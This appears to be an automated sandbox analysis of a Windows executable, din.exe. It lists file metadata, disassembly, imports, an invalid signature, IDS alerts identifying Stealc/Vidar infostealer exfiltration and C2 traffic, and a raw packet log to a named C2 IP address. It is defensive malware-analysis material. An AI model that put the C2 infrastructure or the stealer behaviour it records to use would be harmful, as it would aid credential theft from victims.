                                                                                                                                                                                                                                                                                      Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (6378)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):6383
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.785249513102167
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:hxvN6666VziSiFY67LOYdH+UbfY+PKHbV6HF9qZ:hxF6666gSiFP7L7VH5HFy
                                                                                                                                                                                                                                                                                      MD5:DC672535E8F6761D31AAA4A2E17B6239
                                                                                                                                                                                                                                                                                      SHA1:F4845C280D88B004308FF98A9D9EDE3C988B2709
                                                                                                                                                                                                                                                                                      SHA-256:F1681EEE1B2BC519E5C9F36EF9222658E7724F84DA7918B80C3FB3FAA3E15DD4
                                                                                                                                                                                                                                                                                      SHA-512:950C20175976013B0BD7B948089BF18B57CF0C55FA82D1D3CD66436367B387083A061916DFA01C42E6B8FDFF74DD08D6CF5B8930D8209E1368A490CBE8D4A59E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                      Preview:)]}'.["",["the twilight saga","united airlines body found in wheel well","epic games store free games","philadelphia phillies","nyt strands december 26","tiny brick oven pizza dave portnoy","aurora borealis northern lights forecast","nintendo switch 2 console"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                      MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                      SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                      SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                      SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                      Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):132723
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.436566478203261
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:fekJQ7O4N5dTm+syHEt4W3XdQ4Q6SuSr/nUW2i6o:f/Q7HTt/sHdQ4Q6SDfUW8o
                                                                                                                                                                                                                                                                                      MD5:0EA8E0CEB0AD45C5A3FCC3230095F73B
                                                                                                                                                                                                                                                                                      SHA1:D5FC5EDC5735CF863AC4B45562A871BFF2DCC027
                                                                                                                                                                                                                                                                                      SHA-256:429D59E7F75EFBEA6F74E7DCA1CBC1179ACE282C730908CC3650E4ADA26CCAFB
                                                                                                                                                                                                                                                                                      SHA-512:07FF131BDF835904AB108F41763963FEAEDA032473D3A832719CB18AA78E6D4EA6DDCE0D0CE49546C26DF4ABB436FE2F63B7E5D930E214D0AA1120DE3B66ABA5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.962234251074959
                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                      File name:din.exe
                                                                                                                                                                                                                                                                                      File size:1'224'479 bytes
                                                                                                                                                                                                                                                                                      MD5:ce76b7cda29a7ea80917e5844a7fca42
                                                                                                                                                                                                                                                                                      SHA1:c9a7eeb65056f6743b3a43ca0a7010743003191f
                                                                                                                                                                                                                                                                                      SHA256:88bced6d92559b9ea1974fd4329868e68c104eb58a976d65b9df8af32bbd2400
                                                                                                                                                                                                                                                                                      SHA512:400decdd792a254527fcd5baec0da3c48a4d70f734a1702acb0bb374f515ebe92f2d56c9706fe9a2b59fded5525e4257d624a3be9875147e04a199eb38097cf0
                                                                                                                                                                                                                                                                                      SSDEEP:24576:qW4acYhfuPcbJPltiliv/7GFO5n1BGbJEL0YmTj0RXJJd196ebMic:hvgkhrNpiJA4ANd191y
                                                                                                                                                                                                                                                                                      TLSH:F84523994B904C62EA99DF7572F8EA311F36B1626478CA6FE700844D7B903438D6CB63
                                                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                                                      Icon Hash:bcfc9930d2d8b074
                                                                                                                                                                                                                                                                                      Entrypoint:0x4038af
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: be41bf7b8cc010b614bd36bbca606973
Signature Valid: false
Signature Issuer: CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After
• 17/01/2016 19:00:00 27/03/2019 08:00:00
Subject Chain
• CN=Hamrick Software, O=Hamrick Software, L=Sunny Isles Beach, S=Florida, C=US
Version: 3
Thumbprint MD5: EED0330F674889C759718E9634C7CFBE
Thumbprint SHA-1: 72DA31A1E39FF2688E01CC9246F9655C5479DC44
Thumbprint SHA-256: 2F0E03F8BCDEEFFF96E71C8AFD36F929E0DABD73E2991FF44A5F571DE8BC4D20
Serial: 0E3580050E04BCD215040A908ECA4FCA
Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007FA3D8DC4F6Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007FA3D8DC4C4Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007FA3D8DC4C3Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007FA3D8DC253Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007FA3D8DC4911h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FA3D8DC25C3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FA3D8DC253Ah
add esi, 02h
cmp word ptr [esi], bx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x5a342 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x127537 | 0x39e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0x5a342 | 0x5a400 | 26ea09d48a2eaa1f786b0086be8bbd2f | False | 0.9800359245152355 | data | 7.907321967358554 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x15b000 | 0xfd6 | 0x1000 | ebc94dee2e0cd4d78ba78d353ac504c3 | False | 0.596923828125 | data | 5.583176154022744 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100250 | 0x4cbc5 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.993204139875091
RT_ICON | 0x14ce18 | 0x7d20 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004995004995005
RT_ICON | 0x154b38 | 0x279b | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0010849196173193
RT_ICON | 0x1572d4 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.5777054515866559
RT_ICON | 0x15993c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7039007092198581
RT_DIALOG | 0x159da4 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x159ea4 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x159fc0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x15a020 | 0x4c | data | English | United States | 0.8026315789473685
RT_MANIFEST | 0x15a06c | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T07:09:58.205436+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.7 | 49771 | 188.245.216.205 | 443 | TCP
2024-12-27T07:10:03.389881+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 188.245.216.205 | 443 | 192.168.2.7 | 49781 | TCP
2024-12-27T07:10:06.124006+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.7 | 49782 | 188.245.216.205 | 443 | TCP
2024-12-27T07:10:06.124264+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 188.245.216.205 | 443 | 192.168.2.7 | 49782 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:55.863612890 CET49771443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:55.863660097 CET44349771188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:55.863750935 CET49771443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:55.863945007 CET49771443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:55.863960028 CET44349771188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:57.312060118 CET44349771188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:57.312172890 CET49771443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:57.312608004 CET49771443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:57.312613010 CET44349771188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:57.314307928 CET49771443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:57.314312935 CET44349771188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:58.205446005 CET44349771188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:58.205512047 CET49771443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:58.205524921 CET44349771188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:58.205573082 CET49771443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:58.205718994 CET49771443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:58.205739021 CET44349771188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:58.232224941 CET49776443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:58.232251883 CET44349776188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:58.232345104 CET49776443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:58.232558012 CET49776443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:58.232578039 CET44349776188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:00.101454973 CET44349776188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:00.101670027 CET49776443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:00.102246046 CET49776443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:00.102252007 CET44349776188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:00.103991985 CET49776443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:00.103996992 CET44349776188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.040205956 CET44349776188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.040225029 CET44349776188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.040256023 CET49776443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.040277004 CET44349776188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.040287971 CET49776443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.040294886 CET44349776188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.040318012 CET49776443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.040344954 CET49776443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.040498018 CET49776443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.040509939 CET44349776188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.042207003 CET49781443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.042233944 CET44349781188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.042301893 CET49781443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.042509079 CET49781443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:01.042522907 CET44349781188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:02.143642902 CET8049700217.20.58.101192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:02.143767118 CET4970080192.168.2.7217.20.58.101
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:02.143767118 CET4970080192.168.2.7217.20.58.101
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:02.263281107 CET8049700217.20.58.101192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:02.499789000 CET44349781188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:02.499876022 CET49781443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:02.500303984 CET49781443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:02.500309944 CET44349781188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:02.502119064 CET49781443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:02.502124071 CET44349781188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.389662981 CET44349781188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.389698029 CET44349781188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.389754057 CET49781443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.389766932 CET44349781188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.389822960 CET49781443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.389822960 CET49781443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.390178919 CET49781443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.390198946 CET44349781188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.391824961 CET49782443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.391859055 CET44349782188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.391932964 CET49782443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.392164946 CET49782443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.392180920 CET44349782188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.818409920 CET4969880192.168.2.7192.229.221.95
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.818449974 CET4969980192.168.2.7192.229.221.95
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.938287020 CET8049698192.229.221.95192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.938416004 CET4969880192.168.2.7192.229.221.95
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.938673973 CET8049699192.229.221.95192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:03.940093994 CET4969980192.168.2.7192.229.221.95
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:04.447421074 CET8049702217.20.58.101192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:04.448158026 CET4970280192.168.2.7217.20.58.101
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:04.448196888 CET4970280192.168.2.7217.20.58.101
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:04.567713022 CET8049702217.20.58.101192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:05.105890036 CET44349782188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:05.105988026 CET49782443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:05.107120991 CET49782443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:05.107126951 CET44349782188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:05.108618021 CET49782443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.046382904 CET44349794172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.046662092 CET49794443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.046686888 CET44349794172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.047780037 CET44349794172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.047849894 CET49794443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.048157930 CET49794443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.048227072 CET44349794172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.048331022 CET49794443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.048340082 CET44349794172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.100090981 CET49794443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.520791054 CET44349787172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.520824909 CET44349787172.217.21.36192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.520888090 CET49787443192.168.2.7172.217.21.36
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:12.520889044 CET44349787172.217.21.36192.168.2.7
